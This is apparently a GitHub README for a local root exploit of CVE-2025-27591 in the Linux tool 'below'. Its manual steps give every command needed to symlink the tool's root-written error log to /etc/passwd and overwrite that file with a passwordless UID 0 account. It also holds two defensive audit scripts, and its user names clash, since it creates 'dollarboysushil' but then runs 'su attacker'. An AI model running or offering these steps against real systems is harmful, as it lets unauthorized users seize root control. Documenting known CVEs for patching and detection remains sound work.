dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591


CVE-2025-27591 - Privilege Escalation via Writable Symlink in below

Summary

This is a simple exploit for CVE-2025-27591, a local privilege escalation vulnerability in the below Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignment on the tool's log directory. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When below is run with sudo, it may write error logs into the world-writable directory /var/log/below, which lets an attacker replace the log file with a symlink to a sensitive target such as /etc/passwd.

By exploiting this, an unprivileged user with sudo access to below can escalate privileges to root.


Vulnerability Details

  • CVE ID: CVE-2025-27591
  • Vulnerable Tool: below
  • Affected Feature: Logging via below record
  • Vulnerable Path: /var/log/below/error_root.log
  • Attack Prerequisites:
    • The directory /var/log/below is world-writable
    • The attacker can run sudo /usr/bin/below record without a password
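The two prerequisites above can be checked by a defender before (or after) below is installed. The following audit script is an added example and is not part of this repository or of below itself; it reports whether a log directory is world-writable and whether any entry inside it is a symlink (a planted error_root.log -> /etc/passwd link would be listed). It assumes GNU coreutils (`stat -c`) and a `find` that supports `-maxdepth`.

```shell
#!/bin/sh
# Added defensive audit script, not part of this repository or of below.
# Checks the two preconditions the write-up lists for a below log directory:
# (1) the directory is world-writable, and (2) entries inside it are symlinks.
# Assumes GNU coreutils (stat -c) and a find that supports -maxdepth (GNU/BSD).

# Return 0 if DIR exists and has the "other write" bit set (e.g. mode 777 or 1777).
dir_is_world_writable() {
    dir="$1"
    [ -d "$dir" ] || return 1
    mode=$(stat -c '%a' "$dir" 2>/dev/null) || return 1
    other=$(( mode % 10 ))        # last octal digit = permissions for "other"
    [ $(( other & 2 )) -ne 0 ]
}

# Print "link -> target" for each symlink directly inside DIR; return 0 if any exist.
list_symlinked_logs() {
    dir="$1"
    links=$(find "$dir" -mindepth 1 -maxdepth 1 -type l 2>/dev/null)
    [ -n "$links" ] || return 1
    for f in $links; do
        printf '%s -> %s\n' "$f" "$(readlink "$f")"
    done
    return 0
}

# Combined audit: returns 0 when there are no findings, 1 when any were printed.
audit_below_logdir() {
    dir="${1:-/var/log/below}"
    rc=0
    if dir_is_world_writable "$dir"; then
        echo "WARN: $dir is world-writable; expected root-owned mode 755"
        rc=1
    fi
    if list_symlinked_logs "$dir" >/dev/null; then
        echo "WARN: symlinks found in $dir (a root log write would follow them):"
        list_symlinked_logs "$dir"
        rc=1
    fi
    [ -d "$dir" ] || echo "INFO: $dir does not exist"
    return $rc
}

# Run the audit when invoked directly with a directory argument, e.g.:
#   sh audit_below.sh /var/log/below
if [ "$#" -ge 1 ]; then
    audit_below_logdir "$1"
fi
```

A non-zero exit from `audit_below_logdir` is the signal worth alerting on; the expected hardened state is a root-owned directory with mode 755 and no symlinked log files.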

Exploit Steps (Manual)

✅ Step 1: Verify that the log directory is world-writable. Listing /var/log/below should show:

drwxrwxrwx 2 root root 4096 ... /var/log/below


✅ Step 2: Remove any existing error_root.log

rm -f /var/log/below/error_root.log

✅ Step 3: Create a symlink to /etc/passwd

ln -s /etc/passwd /var/log/below/error_root.log

Then verify the link with:

ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd


✅ Step 4: Create a payload file. This will add a new root user (attacker) with no password:

echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

Field layout of an /etc/passwd line:

username:password:UID:GID:comment(home/full name):home_directory:shell

The key point is the UID and GID fields: both are set to 0, which makes the account a root user and places it in the root group.

✅ Step 5: Trigger a log write as root. This is the core of the exploit.

sudo /usr/bin/below record

This command is expected to fail or time out, but it will try to write error logs to /var/log/below/error_root.log, which now resolves to /etc/passwd. 💡 In some cases this alone may corrupt /etc/passwd, so the next step overwrites it fully.

✅ Step 6: Overwrite /etc/passwd via the symlink

cp /tmp/payload /var/log/below/error_root.log


✅ Step 7: Become root

su attacker

You'll drop into a root shell, no password needed.
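The payload line from Step 4 leaves an identifiable trace in /etc/passwd: an account other than root with UID 0 and GID 0, an empty password field, and /root as its home directory. The following helper is an added detection example, not part of this repository; it scans a passwd-format file for exactly those traits using the field layout described above and is suitable for a periodic integrity check.

```shell
#!/bin/sh
# Added detection helper, not part of this repository. Scans a passwd-format
# file for the traits of the payload line described in Step 4: an empty
# password field, a UID or GID of 0 on an account other than root, or a
# home directory of /root on an account other than root.
# Field layout (as given above): name:password:UID:GID:comment:home:shell

# Print "name reason" for each suspicious entry; return 0 if any were found,
# 1 if the file is clean, 2 if it cannot be read.
passwd_anomalies() {
    file="${1:-/etc/passwd}"
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    awk -F: '
        NF < 7 { next }                                   # skip blank/malformed lines
        $1 != "root" && $3 == 0       { print $1 " uid0";           hits++ }
        $1 != "root" && $4 == 0       { print $1 " gid0";           hits++ }
        $2 == ""                      { print $1 " empty-password"; hits++ }
        $1 != "root" && $6 == "/root" { print $1 " home-is-root";   hits++ }
        END { exit (hits ? 0 : 1) }
    ' "$file"
}

# Number of anomaly lines, for a quick yes/no in a cron job or monitoring check.
passwd_anomaly_count() {
    passwd_anomalies "$1" | wc -l | tr -d ' '
}

# Usage: sh passwd_check.sh [/path/to/passwd]; prints findings, exit 1 = clean.
if [ "$#" -ge 1 ]; then
    passwd_anomalies "$1"
fi
```

Because the check only reads the file, it can also be pointed at a backup copy of /etc/passwd to compare the state before and after a suspected incident.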

Exploit Steps (Automatic)

python3 dbs_exploit.py


About

CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)
